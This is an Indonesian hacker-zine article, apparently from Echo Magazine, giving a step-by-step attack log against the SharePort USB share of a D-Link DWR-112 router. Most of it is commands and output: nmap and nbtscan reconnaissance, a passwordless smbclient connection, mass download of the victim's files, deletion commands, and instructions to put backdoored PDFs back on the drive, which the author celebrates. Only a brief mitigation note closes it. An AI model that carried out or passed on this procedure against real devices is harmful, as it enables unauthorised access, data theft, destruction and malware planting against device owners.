Issue‎ > ‎issue 27‎ > ‎

008.txt

ECHO MAGAZINE VOLUME XI, ISSUE XXVII, PHILE 0x04.TXT
                               :|             ++           
                     :~~/ .::/ :::| ,::\ >::> :| :::\ :~~/ 
                     :::, `::\ :|:| `::/ <::< :| :|:| :::, 
                                                                   

     Hacker Log Book: Abusing D-Link DWR-112 Shareport.
     lirva32 <at> yahoo <dot> com



-----| Pendahuluan

SharePort ?  SharePort merupakan teknologi baru yang banyak diterapkan
pada Access Point model-model terbaru, SharePort merupakan port usb
yang biasa digunakan untuk Folder Sharing dan Printer Sharing.  

Tujuan adanya SharePort pada Access Point adalah agar user bisa
mempergunakan media penyimpanannya yang berupa usb Flashdisk secara
remote melalui wireless, begitu juga dengan sharing printer yang
diterapkannya agar user bisa melakukan pencetakan secara remote melalui
wireless juga.

Tanpa kita sadari pada teknologi tersebut sangatlah rentan terhadap
tindakan penyerangan yang dapat menimbulkan kerugian yang sangat besar,
yaitu : pencurian data, penghapusan data dan penanaman backdoor.


-----| Target Attacking
 
Pada ujicoba kali ini,saya melakukan penyerangan terhadap devices
dengan spesifikasi, sbb :

 [.] Access Point 	:  D-Link 
 [.] Series AP		:  DWR-112
 [.] Firmware version   :  1.04
 [.] USB Port 1		:  USB Hub yang terkonekasi USB Flashdisk dan Printer

* target tidak hanya terbatas pada devices tersebut, kemungkinan
devices lain pun bisa menjadi sasaran dengan karakteristik yang sama.

-----| Persiapan Penyerangan 

 . Notebook	: cukup notebook dengan wireless apa saja
 . OS		: saya mempergunakan BT R3     

---[ Skenario

 
     ((( |---------| )))
         | DWR-112 |                     :------[usb flashdisk]
         |---------|---------[usb hub] --:
           target                        :------[printer]

                             o0o
                             000
                     :----:   |        
                     : xx :  /|\
                     : ---: / | \
                    notebook  |
                             / \
                            /   \
                           attacker

keterangan :  
. attacker akan melakukan penyerangan terhadap SharePort yang
  terdapat pada Access Point melalui wireless 
. attacker akan masuk kedalam usb flashdisk untuk melakukan pencurian
  data dan kegiatan lainnya 
. attacker akan melakukan penyerangan terhadap printer (--akan dibahas 
  pada tulisan berikutnya)

-----| Melakukan Penyerangan 

1.  Lakukan koneksi ke Access Point (AP) yang menjadi target.
    Cek koneksi ke AP :

     root@bt:~# iwconfig 
     lo        no wireless extensions.

     wlan0     IEEE 802.11abg  ESSID:"lirva32_was_here"  
               Mode:Managed  Frequency:2.457 GHz  Access Point: C8:BE:19:8C:37:A4   
               Bit Rate=24 Mb/s   Tx-Power=15 dBm   
               Retry  long limit:7   RTS thr:off   Fragment thr:off
               Encryption key:off
               Power Management:off
               Link Quality=70/70  Signal level=-24 dBm  
               Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
               Tx excessive retries:0  Invalid misc:0   Missed beacon:0

     eth0      no wireless extensions.

2.  Setelah koneksi berhasil, maka kita akan mendapatkan IP dari DHCP
    server.  Sudah menjadi kebiasaan jika AP didirikan selalu saja DHCP
    juga didirikan dengan tujuan untuk mempermudah user melakukan koneksi
    ke wireless AP.  Cek dapat IP berapa dari DHCP Server :

     root@bt:~# ifconfig
     eth0      Link encap:Ethernet  HWaddr 00:1d:72:19:45:4d  
               UP BROADCAST MULTICAST  MTU:1500  Metric:1
               RX packets:0 errors:0 dropped:0 overruns:0 frame:0
               TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
               collisions:0 txqueuelen:1000 
               RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
               Interrupt:16 

     lo        Link encap:Local Loopback  
               inet addr:127.0.0.1  Mask:255.0.0.0
               inet6 addr: ::1/128 Scope:Host
               UP LOOPBACK RUNNING  MTU:16436  Metric:1
               RX packets:474 errors:0 dropped:0 overruns:0 frame:0
               TX packets:474 errors:0 dropped:0 overruns:0 carrier:0
               collisions:0 txqueuelen:0 
               RX bytes:145389 (145.3 KB)  TX bytes:145389 (145.3 KB)

     wlan0     Link encap:Ethernet  HWaddr 00:1c:bf:00:5e:fb  
               inet addr:192.168.0.100  Bcast:192.168.0.255  Mask:255.255.255.0
               inet6 addr: fe80::21c:bfff:fe00:5efb/64 Scope:Link
               UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
               RX packets:1464 errors:0 dropped:0 overruns:0 frame:0
               TX packets:53 errors:0 dropped:0 overruns:0 carrier:0
               collisions:0 txqueuelen:1000 
               RX bytes:161210 (161.2 KB)  TX bytes:7250 (7.2 KB)
  

     Nah, devices kita (wlan0) sudah mendapat IP dari DHCP, yaitu :
     192.168.0.100 /24

3.  Network Scannning, yuk mang kita lakukan network scanning untuk
    mendapatkan target dengan baik dan benar. Tadi kita sudah mendapatkan
    IP untuk wlan0 kan...?? yaitu : 192.168.0.100 /24, maka kita akan
    lakukan proses network scanning 1 range IP yaitu : 192.168.0.1 -
    192.168.0.254.
 
     root@bt:~# nmap -T4 -F 192.168.0.0/24

     Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-26 10:26 WIT
     Nmap scan report for 192.168.0.1
     Host is up (0.0081s latency).
     Not shown: 95 closed ports
     PORT      STATE SERVICE
     53/tcp    open  domain
     80/tcp    open  http
     139/tcp   open  netbios-ssn
     445/tcp   open  microsoft-ds
     49152/tcp open  unknown
     MAC Address: C8:BE:19:87:37:A4 (Unknown)

     Nmap scan report for 192.168.0.100
     Host is up (0.000021s latency).
     Not shown: 99 closed ports
     PORT   STATE SERVICE
     80/tcp open  http

     Nmap done: 256 IP addresses (2 hosts up) scanned in 34.24 seconds


     Wah, perlu perhatian khusus nih, ayo diperhatikan :
     * Port 139/tcp open netbios-ssn.
       Port ini merupakan port Netbios Session Service yang biasanya
       digunakan untuk resource sharing pada windows.  
       Contohnya adalah: Folder n File Sharing, Printer Sharing.

     * Port 445/tcp open microsoft-ds.
       Port ini merupakan port Microsoft Directory Services yang
       biasanya digunakan untuk windows file sharing dan menyediakan
       bayak layanan lainnya.  Port 445/ tcp juga ada sangkutannya
       dengan SMB over IP (SMB is known as "Samba").

     Kedua Port tersebut yaitu : 139/tcp dan 445/tcp  merupakan port
     yang sejak dulu dikenal sangat rentan untuk diserang.



4.  Mari kita lakukan proses scaning yang lebih mendalam terhadap IP
    yang sudah ditargetkan untuk mendapatkan informasi yang lebih lengkap
    lagi.

     root@bt:~# nmap -p 1-65535 -T4 -A -v 192.168.0.1

     Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-26 10:57 WIT
     NSE: Loaded 106 scripts for scanning.
     NSE: Script Pre-scanning.
     Initiating ARP Ping Scan at 10:57
     Scanning 192.168.0.1 [1 port]
     Completed ARP Ping Scan at 10:57, 0.00s elapsed (1 total hosts)
     Initiating Parallel DNS resolution of 1 host. at 10:57
     Completed Parallel DNS resolution of 1 host. at 10:57, 13.00s elapsed
     Initiating SYN Stealth Scan at 10:57
     Scanning 192.168.0.1 [65535 ports]
     Discovered open port 53/tcp on 192.168.0.1
     Discovered open port 80/tcp on 192.168.0.1
     Discovered open port 139/tcp on 192.168.0.1
     Discovered open port 445/tcp on 192.168.0.1
     Discovered open port 49152/tcp on 192.168.0.1
     Completed SYN Stealth Scan at 10:58, 32.92s elapsed (65535 total ports)
     Initiating Service scan at 10:58
     Scanning 5 services on 192.168.0.1
     Completed Service scan at 10:58, 11.22s elapsed (5 services on 1 host)
     Initiating OS detection (try #1) against 192.168.0.1
     NSE: Script scanning 192.168.0.1.
     Initiating NSE at 10:58
     Completed NSE at 10:58, 7.50s elapsed
     Nmap scan report for 192.168.0.1
     Host is up (0.0031s latency).
     Not shown: 65529 closed ports
     PORT      STATE    SERVICE     VERSION
     1/tcp     filtered tcpmux
     53/tcp    open     domain      dnsmasq 2.45
     | dns-nsid: 
     |_bind.version: dnsmasq-2.45
       80/tcp    open     http?
     |_http-favicon: Unknown favicon MD5: 107579220745D3B21461C23024D6C4A3
     |_http-methods: No Allow or Public header in OPTIONS response (status code 501)
     |_http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME
       139/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
       445/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
       49152/tcp open     unknown
      -
      - 
      -
      SF:99\x2017:22:07\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\
      SF:x20\x20\x20127\r\n\r\n<title>501\x20Not\x20Implemented</title>\n<h1>501
      SF:\x20Not\x20Implemented</h1>\nYour\x20request\x20was\x20not\x20understoo
      SF:d\x20or\x20not\x20allowed\x20by\x20this\x20server\.\n");
      MAC Address: C8:BE:19:87:37:A4 (Unknown)
      Device type: general purpose
      Running: Linux 2.6.X
      OS CPE: cpe:/o:linux:linux_kernel:2.6
      OS details: Linux 2.6.17 - 2.6.36
      Uptime guess: 0.054 days (since Tue Mar 26 09:41:33 2013)
      Network Distance: 1 hop
      TCP Sequence Prediction: Difficulty=206 (Good luck!)
      IP ID Sequence Generation: All zeros

      Host script results:
      | smb-os-discovery: 
      |   OS: Unix (Samba 3.0.24)
      |   NetBIOS computer name: 
      |   Workgroup: WORKGROUP
      |_  System time: 2000-01-01T01:22:11+08:00
      | smb-security-mode: 
      |   Account that was used for smb scripts: guest
      |   Share-level authentication (dangerous)
      |   SMB Security: Challenge/response passwords supported
      |_  Message signing disabled (dangerous, but default)
      |_smbv2-enabled: Server doesn't support SMBv2 protocol

      TRACEROUTE
      HOP RTT     ADDRESS
      1   3.12 ms 192.168.0.1

      NSE: Script Post-scanning.
      Read data files from: /usr/local/bin/../share/nmap
      OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
      Nmap done: 1 IP address (1 host up) scanned in 68.65 seconds
                 Raw packets sent: 65681 (2.891MB) | Rcvd: 65630 (2.626MB)
Wooowww, informasi yang kita dapatkan semakin mendalam tentunya, diantaranya :
*  53/tcp    open     domain      dnsmasq 2.45 
*  http-title: D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME   
*  139/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
*  445/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
*  MAC Address: C8:BE:19:87:37:A4 (Unknown)
   Device type: general purpose
   Running: Linux 2.6.X
   OS CPE: cpe:/o:linux:linux_kernel:2.6
      *  Host script results:
         | smb-os-discovery: 
         |   OS: Unix (Samba 3.0.24)
         |   NetBIOS computer name: 
         |   Workgroup: WORKGROUP
         |_  System time: 2000-01-01T01:22:11+08:00
         | smb-security-mode: 
         |   Account that was used for smb scripts: guest
         |   Share-level authentication (dangerous)
         |   SMB Security: Challenge/response passwords supported
         |_  Message signing disabled (dangerous, but default)
         |_smbv2-enabled: Server doesn't support SMBv2 protocol

      * Ternyata port 139/tcp dan 445/tcp mengaktifkan smbd 3.x dengan
        nama workgroup : WORKGROUP 

                  

5.  Yuk kita lanjut pada proses berikutnya, yaitu mengidentifikasi smbd 3.x :
     
     root@bt:~# nbtscan 192.168.0.1
     Doing NBT name scan for addresses from 192.168.0.1

     IP address       NetBIOS Name     Server    User             MAC address      
     ------------------------------------------------------------------------------
     192.168.0.1      DWR-112          <server>  DWR-112          00-00-00-00-00-00


     
     Lanjut untuk mencari informasi berikutnya :

     root@bt:~# nbtscan -v -s : 192.168.0.1
     192.168.0.1:DWR-112        �:00U
     192.168.0.1:DWR-112        �:03U
     192.168.0.1:DWR-112        �:20U
     192.168.0.1:DWR-112        �:00U
     192.168.0.1:DWR-112        �:03U
     192.168.0.1:DWR-112        �:20U
     192.168.0.1:WORKGROUP      �:00G
     192.168.0.1:WORKGROUP      �:1eG
     192.168.0.1:WORKGROUP      �:00G
     192.168.0.1:WORKGROUP      �:1eG
     192.168.0.1:MAC:00-00-00-00-00-00


     Wowwww lagi ahhhh... akhirnya kita bisa mendapatkan informasi
     untuk smbd 3.x, yaitu :
     *  IP            : 192.168.0.1
     *  NetBIOS Name  : DWR-112
     *  Server        : <server>
     *  User          : DWR-112



6.  Nah, sekarang saatnya kita lanjut pada proses penyerangan kepada
    media penyimpanannya :

     root@bt:~# smbclient -L 192.168.0.1
     Enter root's password: 
     Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]

	Sharename       Type      Comment
	---------       ----      -------
	Drive_A5        Disk      Device(A) (SanDisk,Firebird USB Flash Drive)
	IPC$            IPC       IPC Service (DWR-112)

     Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]

	Server               Comment
	---------            -------
	Workgroup            Master
	---------            -------

     * ketika diminta password cukup tekan enter saja.


     Informasi yang berharga dari proses ini adalah kita bisa
     mendapatkan :
     * Sharename 	:  Drive_A5, IPC$

  
     command :

     root@bt:~# smbclient //NetBIOS Name/Sharename ""


     root@bt:~# smbclient //DWR-112/Drive_A5 ""
     Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
     Server not using user level security and no password supplied.
     smb: \> 

     * akhirnya kita masuk kedalam console smb, selamat menikmati coy...;)



7.  Kini saatnya memperdayai media penyimpanan target melalui smb
    console :

     root@bt:~# smbclient //DWR-112/Drive_A5 ""
     Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
     Server not using user level security and no password supplied.
     smb: \> help
     ?              allinfo        altname        archive        blocksize      
     cancel         case_sensitive cd             chmod          chown          
     close          del            dir            du             echo           
     exit           get            getfacl        hardlink       help           
     history        iosize         lcd            link           lock           
     lowercase      ls             l              mask           md             
     mget           mkdir          more           mput           newer          
     open           posix          posix_encrypt  posix_open     posix_mkdir    
     posix_rmdir    posix_unlink   print          prompt         put            
     pwd            q              queue          quit           rd             
     recurse        reget          rename         reput          rm             
     rmdir          showacls       setmode        stat           symlink        
     tar            tarmode        translate      unlock         volume         
     vuid           wdel           logon          listconnect    showconnect    
     ..             !              
     smb: \> 


     [01]  Melihat status koneksi ke smb :
           smb: \> showconnect 
           //DWR-112/Drive_A5


     [02]  Melihat isi usb flashdisk target :
           smb: \> l
           .                                   D        0  Thu Jan  1 07:00:00 1970
           ..                                  D        0  Fri Dec 31 23:00:26 1999
           CCNA_Preparing                      D        0  Mon Nov  5 17:43:36 2012
           CCNA_Preparing - Copy               D        0  Mon Nov  5 17:43:36 2012
           Copy please                         D        0  Wed Dec  5 13:51:24 2012
           ebook_pilihan                       D  8857314  Sat Nov 10 10:56:02 2012
           MODUL MIKROTIK                      D        0  Tue Aug  7 10:56:22 2012
           ModulWiFiOkeh_cetak                 D        0  Mon Dec  3 16:14:22 2012
           passwordspeedy.txt                         471  Tue Nov 20 00:50:14 2012
           PENTESTER CAREER.pptx                  3057314  Sat Nov 10 10:56:02 2012
           -*
           -*
           -*  
           hal.dll                                 134400  Tue Aug  3 20:59:14 2004   
           Modul DBA.docx                         1027752  Wed Mar 13 15:29:54 2013
           ModulWireless_okeh_bgt.pdf             4624212  Fri Jan 11 10:40:48 2013
  
		60xx1 blocks of size 6xx36. 15141 blocks available

           * isi file tidak semuanya saya tampilkan ;)

     [03]  Mengambil isi usb flasdisk target :

           root@bt:/# mkdir /home/hasil
           root@bt:/# cd /home/hasil/

           root@bt:/home/hasil# smbclient //DWR-112/Drive_A5 ""
           Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]
           Server not using user level security and no password supplied

           smb: \> mget *.*
           Get file 3030-3040.jpg? yes
           getting file \3030-3040.jpg of size 99947 as 3030-3040.jpg (1162.0 KiloBytes/sec) (average 1162.0 KiloBytes/sec)
           -
           -
           Get file hal.dll? yes
           getting file \hal.dll of size 134400 as hal.dll (1274.3 KiloBytes/sec) (average 915.5 KiloBytes/sec)

           Get file Modul_Wireless.pdf? yes
           getting file \Modul_Wireless.pdf of size 5512257 as Modul_Wireless.pdf (2019.2 KiloBytes/sec) 
           (average 2064.6 KiloBytes/sec)
           
           Get file Modul_wokShop2_cetak.doc? yes
           getting file \Modul_wokShop2_cetak.doc of size 32209354 as Modul_wokShop2_cetak.doc (1850.8 KiloBytes/sec) 
           (average 1917.6 KiloBytes/sec)

           dst

     [04]  Menghapus isi usb flasdisk target :
           *kegiatan ini sangat berbahaya, juga mudah diketaui oleh
           pemiliknya so hati2 saja.

           menghapus 1 file : 
           ------------------
           smb: \> del filename.ext


	   menghapus folder :
           ---------------------
           smb: \> del folder_name\*.*
           smb: \> rmdir folder_name


     [05]  Menanam backdoor ke isi usb flasdisk target :
           . dowload file pdf dari usb target
             
           smb: \ebook_pilihan\> mget *.pdf
           Get file Modul_wokShop2.pdf? yes
           getting file \jasakom_workshop2\Modul_wokShop2.pdf of size 5627760 as Modul_wokShop2.pdf (2006.5 KiloBytes/sec) 
           (average 2006.5 KiloBytes/sec)

           nah, sekarang file *.pdf sudah kita dapatkan, kini saatnya
           file *.pdf tersebut Anda sisipkan backdoor.  Maaf, saya
           tidak menulis bagaimana menyisipkan backdoor kedalam *.pdf,
           silahkan dicari saja di google ;)
          
           Setelah *.pdf Anda sisipkan backdoor, sekarang tinggal kita
           masukan saja *.pdf tersebut melalui smb console :

           smb: \ebook_pilihan\> mput *.pdf
           Put file Modul_wokShop2.pdf? yes
           putting file Modul_wokShop2.pdf as \jasakom_workshop2\Modul_wokShop2.pdf (1245.9 kb/s) (average 1245.9 kb/s)
           -
           -
           -
           Put file MICROSOFT  SQL SERVER 7.pdf? yes
           putting file MICROSOFT  SQL SERVER 7.pdf as \jasakom_workshop2\MICROSOFT  SQL SERVER 7.pdf (1124.3 kb/s) 
           (average 1209.3 kb/s)
            
           Selesai sudah penanaman backdoor dilakukan, tinggal tunggu
           waktu saja..backdoor tersebut akan bekerja sesuai dengan
           trigger yang telah ditetapkan ;) lol

-----|  Melakukan Pengamanan :

Ada beberapa cara untuk mengurangi ketidak amanan, hanya mengurani saja
kok, yaitu : 
1. Usahakan untuk tidak mempergunakan fasilitas shareport terhadap usb
   flashdisk yg kita miliki 
2. Amankan koneksi wireless AP dengan WPS, WPA2 dan MAC Filter agar
   wireless kita tidak dipergunakan oleh pemakai yang tidak jelas.

-----|  Referensi :
[1] http://www.samba.org/samba/docs/man/manpages-3/smbclient.1.html


-----|  Greetz :

[1] Echo|Staff 
[2] MyDaughter : Faiza Debian dan Fivana Gutsy "Anakku...ini dunia ayahmu.. tidak usah malu !! :)"
[3] Kang Arif s4kitj1wa, Flexus, SheraYusuf, etc
[4] Asistenku : Rouda, Roso n Rahmad... thx for everythings.....
[5] AllMyStudent@STMIK Bina Insani : kalian bisa menjadi apa yang kalian inginkan..belajarlah..!!!  
[6] GXRG, RNDC, MyAlmamater : FTI_Univ_Budi_Luhur, IndonesianLockPicking.
          

Comments